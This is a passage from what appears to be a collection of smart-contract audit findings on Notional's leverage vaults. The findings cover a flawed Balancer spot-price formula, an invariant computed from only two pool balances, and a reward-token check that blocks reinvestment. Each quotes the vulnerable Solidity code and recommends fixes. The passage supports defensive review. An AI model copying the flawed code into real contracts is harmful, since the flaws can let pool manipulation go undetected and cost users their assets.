balanceX).mulDown(balanceX)).sub(b.mulDown(balanceX));\\n\\n // The rounding direction is irrelevant as we're about to introduce a much larger error when converting to log\\n // space. We use `divUp` as it prevents the result from being zero, which would make the logarithm revert. A\\n // result of zero is therefore only possible with zero balances, which are prevented via other means.\\n return derivativeX.divUp(derivativeY);\\n }\\n }\\n```\\n\\nOn a high level, the spot price is computed by determining the pool derivatives. The Balancer SDK provides a feature to compute the spot price of any two tokens within a pool, and it leverages the `_poolDerivatives` function.\\nThe existing function for computing the spot price of any two tokens of a composable pool has the following errors or discrepancies from the approach used to compute the spot price in the Balancer SDK, which might lead to an inaccurate spot price being computed.\\nInstance 1\\nThe comments and SDK add `b.y` and `b.x` to the numerator and denominator, respectively, in the formula. 
However, the code performs a subtraction.\\nInstance 2\\nPer the comment and SDK code, $b = (S - D) a + D$.\\nHowever, assuming that $S$ is zero (for a two-token pool), the following code used in the Leverage Vault to compute $b$ is not equivalent to the above (see the worked substitution after this list).\\n```\\nuint256 b = Math.mul(invariant, a).sub(invariant);\\n```\\n\\nInstance 3\\nThe $S$ in the code will always be zero because the code is catered only for two-token pools. However, a composable pool can support up to five (5) tokens. $S$ should be as follows, where $balances$ consists of all the tokens in the composable pool except for BPT.\\n$$ S = \\sum_{i \\neq \\text{tokenIndexIn}, i \\neq \\text{tokenIndexOut}} \\text{balances}[i] $$\\nInstance 4\\nInstance 5\\nPer the SDK, the amplification factor is scaled down by $n^{(n - 1)}$ where $n$ is the number of tokens in a composable pool (excluding BPT). However, this scaling was not implemented within the code.
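Worked substitution for Instance 2 (assuming $S = 0$, as the two-token code effectively does):\\n$$ b_{\\text{comment}} = D + a(S - D) = D + a(0 - D) = D(1 - a), \\qquad b_{\\text{code}} = Da - D = D(a - 1) $$\\nThe two expressions agree only when $a = 1$; for any other amplification value they differ (one is the negative of the other), so the code's $b$ does not match the documented formula.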
Given the multiple discrepancies between the implementation of the Leverage Vault's `_calcSpotPrice` function and the Balancer SDK, and the lack of public documentation, it is recommended to reach out to the Balancer protocol team to identify the actual formula used to determine the spot price of any two tokens within a composable pool and to confirm whether the formula in the SDK is up to date for the current composable pool implementation.\\nIt is also recommended to implement additional tests to ensure that `_calcSpotPrice` returns the correct spot price for composable pools.\\nIn addition, the `StableMath._calcSpotPrice` function is no longer used or found within the current version of Balancer's composable pool. Thus, there is no guarantee that the math within `StableMath._calcSpotPrice` works with the current implementation. It is recommended to use an existing method in the current Composable Pool's StableMath, such as `_calcOutGivenIn` (with the fee excluded), to compute the spot price.
The spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.
```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n```\\n
Incorrect invariant used for Balancer's composable pools
high
Only two balances instead of all balances were used when computing the invariant for Balancer's composable pools, which is incorrect. As a result, pool manipulation might not be detected. This could lead to the transaction being executed on the manipulated pool, resulting in a loss of assets.\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n..SNIP..\\n```\\n\\nA composable pool can support up to 5 tokens (excluding the BPT). When computing the invariant for a composable pool, one needs to pass in the balances of all the tokens within the pool except for BPT. However, the existing code always only passes in the balance of two tokens, which will return an incorrect invariant if the composable pool supports more than two tokens.\\nFollowing is the formula for computing the invariant of a composable pool taken from Balancer's Composable Pool. The `balances` passed into this function consist of all `balances` except for BPT (Reference)\\n```\\nfunction _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n{\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n```\\n\\nWithin the `_poolDerivatives` function, the `balances` used to compute the invariant consist of the balance of all tokens in the pool, except for BPT, which is aligned with the earlier understanding.\\n```\\nexport function _poolDerivatives(\\n A: BigNumber,\\n balances: OldBigNumber[],\\n tokenIndexIn: number,\\n tokenIndexOut: number,\\n is_first_derivative: boolean,\\n wrt_out: boolean\\n): OldBigNumber {\\n const totalCoins = balances.length;\\n const D = _invariant(A, balances);\\n```\\n
Review if there is any specific reason for passing in only the balance of two tokens when computing the invariant. Otherwise, the balance of all tokens (except BPT) should be used to compute the invariant.\\nIn addition, it is recommended to include additional tests to ensure that the computed spot price is aligned with the market price.
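A sketch of the suggested direction (variable names are illustrative; `bptIndex` is assumed to be obtainable from the pool or the staking mixin):\\n```\\n// Build the full array of scaled balances, dropping the BPT entry, before computing D.\\nuint256[] memory scaled = new uint256[](balances.length - 1);\\nuint256 j;\\nfor (uint256 i; i < balances.length; i++) {\\n    if (i == bptIndex) continue; // BPT is excluded from the invariant\\n    scaled[j++] = balances[i] * scalingFactors[i] / BALANCER_PRECISION;\\n}\\nuint256 invariant = StableMath._calculateInvariant(ampParam, scaled, true);\\n```\\n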
An incorrect invariant will lead to an incorrect spot price being computed. The spot price is used within the `_checkPriceAndCalculateValue` function that is intended to revert if the spot price on the pool is not within some deviation tolerance of the implied oracle price, to prevent any pool manipulation. As a result, an incorrect spot price leads to false positives or false negatives; in the worst-case scenario, pool manipulation is not caught by this function, and the transaction proceeds to be executed.\\nThe `_checkPriceAndCalculateValue` function was found to be used within the following functions:\\n`reinvestReward` - If the `_checkPriceAndCalculateValue` function is malfunctioning, it will cause the vault to add liquidity into a pool that has been manipulated, leading to a loss of assets.\\n`convertStrategyToUnderlying` - This function is used by Notional V3 for the purpose of computing the collateral values and the account's health factor. If the `_checkPriceAndCalculateValue` function reverts unexpectedly due to an incorrect invariant/spot price, many of Notional's core functions will break. In addition, the collateral values and the account's health factor might be inflated if it fails to detect a manipulated pool due to incorrect invariant/spot price, potentially allowing the malicious actors to drain the main protocol.
```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n..SNIP..\\n```\\n
Unable to reinvest if the reward token equals one of the pool tokens
high
If the reward token is the same as one of the pool tokens, the protocol would not be able to reinvest such a reward token, leading to a loss of assets for the vault shareholders.\\nDuring the reinvestment process, the `reinvestReward` function will be executed once for each reward token. The length of the `trades` listing defined in the payload must be the same as the number of tokens in the pool per Line 339 below.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n```\\n\\nIn addition, due to the requirement at Line 105, each element in the `trades` listing must buy a token within the pool and must be ordered in sequence according to the pool's token indexes.\\n```\\nFile: StrategyUtils.sol\\n function executeRewardTrades(\\n IERC20[] memory tokens,\\n SingleSidedRewardTradeParams[] calldata trades,\\n address rewardToken,\\n address poolToken\\n ) external returns(uint256[] memory amounts, uint256 amountSold) {\\n amounts = new uint256[](trades.length);\\n for (uint256 i; i < trades.length; i++) {\\n // All trades must sell the same token.\\n require(trades[i].sellToken == rewardToken);\\n // Bypass certain invalid trades\\n if (trades[i].amount == 0) continue;\\n if (trades[i].buyToken == poolToken) continue;\\n\\n // The reward trade can only purchase tokens that go into the pool\\n require(trades[i].buyToken == address(tokens[i]));\\n```\\n\\nAssume the TriCRV Curve pool (crvUSD+WETH+CRV) has two reward tokens (CRV & CVX). This example is taken from a live Curve pool on Ethereum (Reference 1, Reference 2).\\nThe pool will consist of the following tokens:\\n```\\ntokens[0] = crvUSD\\ntokens[1] = WETH\\ntokens[2] = CRV\\n```\\n\\nThus, assume the protocol receives 3000 CRV reward tokens and intends to sell 1000 CRV for crvUSD and 1000 CRV for WETH.\\nThe `trades` list has to be defined as below:\\n```\\ntrades[0].sellToken = CRV (rewardToken) | trades[0].buyToken = crvUSD | trades[0].amount = 1000\\ntrades[1].sellToken = CRV (rewardToken) | trades[1].buyToken = WETH | trades[1].amount = 1000\\ntrades[2].sellToken = CRV (rewardToken) | trades[2].buyToken = CRV | trades[2].amount = 0\\n```\\n\\nThe same issue also affects the Balancer pools. Thus, the example is omitted for brevity. 
One of the affected Balancer pools is as follows, where the reward token is also one of the pool tokens.\\nWETH-AURA - Reference 1 Reference 2 (Reward Tokens = [BAL, AURA])\\nHowever, the issue is that the `_isInvalidRewardToken` check within `_executeRewardTrades` will always cause a revert for such a reward token.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function _executeRewardTrades(SingleSidedRewardTradeParams[] calldata trades) internal returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256[] memory amounts\\n ) {\\n // The sell token on all trades must be the same (checked inside executeRewardTrades) so\\n // just validate here that the sellToken is a valid reward token (i.e. none of the tokens\\n // used in the regular functioning of the vault).\\n rewardToken = trades[0].sellToken;\\n if (_isInvalidRewardToken(rewardToken)) revert Errors.InvalidRewardToken(rewardToken);\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n (amounts, amountSold) = StrategyUtils.executeRewardTrades(\\n tokens, trades, rewardToken, address(POOL_TOKEN())\\n );\\n }\\n```\\n\\nThe reason is that the `_isInvalidRewardToken` function checks whether the reward token to be sold is one of the pool tokens. In this case, the condition will be evaluated to be true, and a revert will occur. As a result, the protocol would not be able to reinvest such reward tokens.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n
Consider tracking the number of pool tokens received during an emergency exit, and segregate these tokens from the reward tokens. For instance, if the vault holds 3000 CRV, of which 1000 were received during the emergency exit while the rest are reward tokens emitted from Convex/Aura, the protocol can sell all CRV on the vault except for the 1000 CRV reserved.
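One possible shape of that tracking, as a rough sketch (the storage variable and helper below are hypothetical):\\n```\\n// Recorded during emergencyExit(): how many units of each pool token the vault holds\\n// purely as a result of the proportional exit.\\nmapping(address => uint256) internal emergencyExitBalances;\\n\\nfunction _maxSellableRewardBalance(address rewardToken) internal view returns (uint256) {\\n    uint256 balance = IERC20(rewardToken).balanceOf(address(this));\\n    // Reward tokens that double as pool tokens (e.g. CRV in TriCRV) may only be sold\\n    // down to the amount reserved from the emergency exit.\\n    return balance - emergencyExitBalances[rewardToken];\\n}\\n```\\n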
The reinvestment of reward tokens is a critical component of the vault. The value per vault share increases when reward tokens are sold for the pool tokens and reinvested back into the Curve/Balancer pool to obtain more LP tokens. If this feature does not work as intended, it will lead to a loss of assets for the vault shareholders.
```\\nFile: SingleSidedLPVaultBase.sol\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n```\\n